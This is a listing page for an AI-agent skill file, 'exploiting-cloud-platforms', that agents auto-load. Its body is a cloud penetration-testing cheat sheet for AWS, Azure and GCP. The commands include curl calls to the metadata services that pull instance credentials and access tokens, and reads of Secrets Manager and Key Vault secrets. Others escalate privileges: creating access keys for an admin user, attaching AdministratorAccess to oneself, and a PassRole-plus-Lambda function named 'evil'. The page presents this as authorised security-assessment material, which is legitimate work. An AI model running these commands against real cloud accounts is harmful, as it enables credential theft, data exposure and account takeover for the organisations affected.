exploiting-cloud-platforms

Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.

16 stars

bydiegosouzapw

View on GitHub Installation ↓

Best use case

exploiting-cloud-platforms is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

Teams using exploiting-cloud-platforms should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

You only need a quick one-off answer and do not need a reusable workflow.
You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/exploiting-cloud-platforms/SKILL.md --create-dirs "https://raw.githubusercontent.com/diegosouzapw/awesome-omni-skill/main/skills/devops/exploiting-cloud-platforms/SKILL.md"

Manual Installation

Download SKILL.md from GitHub
Place it in .claude/skills/exploiting-cloud-platforms/SKILL.md inside your project
Restart your AI agent — it will auto-discover the skill

How exploiting-cloud-platforms Compares

Feature / Agent	exploiting-cloud-platforms	Standard Approach
Platform Support	Not specified	Limited / Varies
Context Awareness	High	Baseline
Installation Complexity	Unknown	N/A

Frequently Asked Questions

What does this skill do?

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# Exploiting Cloud Platforms

## When to Use

- AWS, Azure, or GCP security assessment
- Cloud misconfiguration exploitation
- S3/Blob/Storage bucket hunting
- Cloud IAM privilege escalation
- Serverless function exploitation
- Cloud metadata service abuse

## AWS Security

### AWS CLI Setup

```bash
# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1

# Test credentials
aws sts get-caller-identity

# List available regions
aws ec2 describe-regions
```

### S3 Bucket Enumeration

```bash
# List buckets
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive

# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/

# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name

# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
```

**S3 Bucket Discovery:**
```bash
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets

# Tools
# s3scanner
python3 s3scanner.py buckets.txt

# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
```

### IAM Enumeration

```bash
# Current user info
aws sts get-caller-identity

# List IAM users (if allowed)
aws iam list-users

# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username

# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1

# List roles
aws iam list-roles

# List groups
aws iam list-groups
```

### EC2 Enumeration

```bash
# List instances
aws ec2 describe-instances

# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# List security groups
aws ec2 describe-security-groups

# List key pairs
aws ec2 describe-key-pairs

# List snapshots
aws ec2 describe-snapshots --owner-ids self

# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
```

### Lambda Functions

```bash
# List functions
aws lambda list-functions

# Get function code
aws lambda get-function --function-name function-name

# Invoke function
aws lambda invoke --function-name function-name output.txt

# Get function configuration
aws lambda get-function-configuration --function-name function-name
```

### RDS Enumeration

```bash
# List DB instances
aws rds describe-db-instances

# List DB snapshots
aws rds describe-db-snapshots

# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
```

### Secrets Manager

```bash
# List secrets
aws secretsmanager list-secrets

# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
```

### CloudTrail (Logging)

```bash
# Check if CloudTrail is enabled
aws cloudtrail describe-trails

# Check trail status
aws cloudtrail get-trail-status --name trail-name

# Get recent events
aws cloudtrail lookup-events
```

### AWS Privilege Escalation

**Common Misconfigurations:**
```bash
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
```

**Exploitation Examples:**
```bash
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user

# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
```

## Azure Security

### Azure CLI Setup

```bash
# Login
az login

# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID

# Get current account
az account show

# List subscriptions
az account list
```

### Blob Storage Enumeration

```bash
# List storage accounts
az storage account list

# List containers
az storage container list --account-name accountname

# List blobs
az storage blob list --container-name containername --account-name accountname

# Download blob
az storage blob download --container-name containername --name filename --account-name accountname

# Check public access
az storage container show --name containername --account-name accountname

# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
```

**Blob Discovery:**
```bash
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files

# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
```

### VM Enumeration

```bash
# List VMs
az vm list

# List VM images
az vm image list

# Get VM details
az vm show --resource-group RG --name VMname

# List NICs
az network nic list

# List public IPs
az network public-ip list
```

### Azure AD Enumeration

```bash
# List users
az ad user list

# Get current user
az ad signed-in-user show

# List groups
az ad group list

# List service principals
az ad sp list

# List applications
az ad app list
```

### Function Apps

```bash
# List function apps
az functionapp list

# Get function app details
az functionapp show --name functionappname --resource-group RG

# List functions
az functionapp function list --name functionappname --resource-group RG

# Download function code
az functionapp deployment source config-zip --name functionappname --resource-group RG
```

### Key Vault

```bash
# List key vaults
az keyvault list

# List secrets
az keyvault secret list --vault-name vaultname

# Get secret
az keyvault secret show --name secretname --vault-name vaultname
```

### Azure Metadata Service

```bash
# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```

## GCP Security

### gcloud Setup

```bash
# Login
gcloud auth login

# Login with service account
gcloud auth activate-service-account --key-file=key.json

# Get current account
gcloud config list

# List projects
gcloud projects list
```

### Storage Bucket Enumeration

```bash
# List buckets
gsutil ls

# List bucket contents
gsutil ls gs://bucket-name/

# Download files
gsutil cp gs://bucket-name/file.txt ./

# Check bucket permissions
gsutil iam get gs://bucket-name/

# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
```

**Bucket Discovery:**
```bash
# Common patterns
company-backup
company-data
company_backup
company_data

# GCPBucketBrute
python3 gcpbucketbrute.py -k company
```

### Compute Engine

```bash
# List instances
gcloud compute instances list

# Get instance details
gcloud compute instances describe instance-name --zone=zone

# List disks
gcloud compute disks list

# List snapshots
gcloud compute snapshots list

# List firewall rules
gcloud compute firewall-rules list
```

### IAM Enumeration

```bash
# List service accounts
gcloud iam service-accounts list

# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID

# List roles
gcloud iam roles list

# Describe role
gcloud iam roles describe roles/editor
```

### Cloud Functions

```bash
# List functions
gcloud functions list

# Describe function
gcloud functions describe function-name --region=region

# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
```

### GCP Metadata Service

```bash
# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"

# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
```

## Cloud Exploitation Tools

**AWS:**
```bash
# Pacu - AWS exploitation framework
python3 pacu.py

# ScoutSuite - Security auditing
python3 scout.py aws

# Prowler - Security assessment
./prowler -M csv

# WeirdAAL - AWS attack library
python3 weirdAAL.py
```

**Azure:**
```bash
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains

# ScoutSuite
python3 scout.py azure

# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
```

**GCP:**
```bash
# ScoutSuite
python3 scout.py gcp

# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
```

## Quick Cloud Wins

**AWS:**
- Public S3 buckets with sensitive data
- Overly permissive IAM policies
- Unencrypted snapshots
- Public RDS instances
- Lambda functions with secrets in environment variables
- EC2 metadata service abuse (SSRF)

**Azure:**
- Public blob storage containers
- Overly permissive RBAC
- Exposed Key Vault secrets
- Public-facing VMs with weak credentials
- Function apps with hardcoded secrets

**GCP:**
- Public storage buckets
- Overly permissive IAM bindings
- Public compute instances
- Service account key exposure
- Cloud Functions with secrets in code

## Common Cloud Misconfigurations

1. **Public Storage** - S3/Blob/GCS buckets with public read/write
2. **Excessive Permissions** - Overly permissive IAM/RBAC policies
3. **Exposed Secrets** - Keys/passwords in code, environment variables
4. **No MFA** - Critical accounts without multi-factor authentication
5. **Open Security Groups** - 0.0.0.0/0 access on sensitive ports
6. **Unencrypted Data** - Storage/databases without encryption
7. **Default Credentials** - Services using default passwords
8. **Exposed Metadata** - SSRF to cloud metadata services
9. **Public Snapshots** - EBS/disk snapshots publicly accessible
10. **CloudTrail Disabled** - No logging of API calls

## References

- https://book.hacktricks.xyz/pentesting-web/buckets
- https://github.com/RhinoSecurityLabs/pacu
- https://github.com/NetSPI/MicroBurst
- https://github.com/nccgroup/ScoutSuite
- https://cloudsecdocs.com/

Related Skills

jumpcloud-automation

from diegosouzapw/awesome-omni-skill

Automate Jumpcloud tasks via Rube MCP (Composio). Always search tools first for current schemas.

icims-talent-cloud-automation

from diegosouzapw/awesome-omni-skill

Automate Icims Talent Cloud tasks via Rube MCP (Composio). Always search tools first for current schemas.

hybrid-cloud-networking

from diegosouzapw/awesome-omni-skill

Configure secure, high-performance connectivity between on-premises infrastructure and cloud platforms using VPN and dedicated connections. Use when building hybrid cloud architectures, connecting ...

hybrid-cloud-architect

from diegosouzapw/awesome-omni-skill

Expert hybrid cloud architect specializing in complex multi-cloud solutions across AWS/Azure/GCP and private clouds (OpenStack/VMware).

google-cloud-vision-automation

from diegosouzapw/awesome-omni-skill

Automate Google Cloud Vision tasks via Rube MCP (Composio). Always search tools first for current schemas.

gcp-cloud

from diegosouzapw/awesome-omni-skill

Google Cloud Platform infrastructure patterns and best practices. Use when designing or implementing GCP solutions including Compute Engine, Cloud Functions, Cloud Storage, and BigQuery.

gcp-cloud-run

from diegosouzapw/awesome-omni-skill

Specialized skill for building production-ready serverless applications on GCP. Covers Cloud Run services (containerized), Cloud Run Functions (event-driven), cold start optimization, and event-dri...

devops-cloud

from diegosouzapw/awesome-omni-skill

Master DevOps, cloud infrastructure, containerization, CI/CD, Kubernetes, and infrastructure as code. Use when deploying applications, setting up infrastructure, or managing cloud services.

database-cloud-optimization-cost-optimize

from diegosouzapw/awesome-omni-skill

You are a cloud cost optimization expert specializing in reducing infrastructure expenses while maintaining performance and reliability. Analyze cloud spending, identify savings opportunities, and ...

cloudpress-automation

from diegosouzapw/awesome-omni-skill

Automate Cloudpress tasks via Rube MCP (Composio). Always search tools first for current schemas.

cloudlayer-automation

from diegosouzapw/awesome-omni-skill

Automate Cloudlayer tasks via Rube MCP (Composio). Always search tools first for current schemas.

Cloudinary Automation

from diegosouzapw/awesome-omni-skill

Automate Cloudinary media management including folder organization, upload presets, asset lookup, transformations, and usage monitoring through natural language commands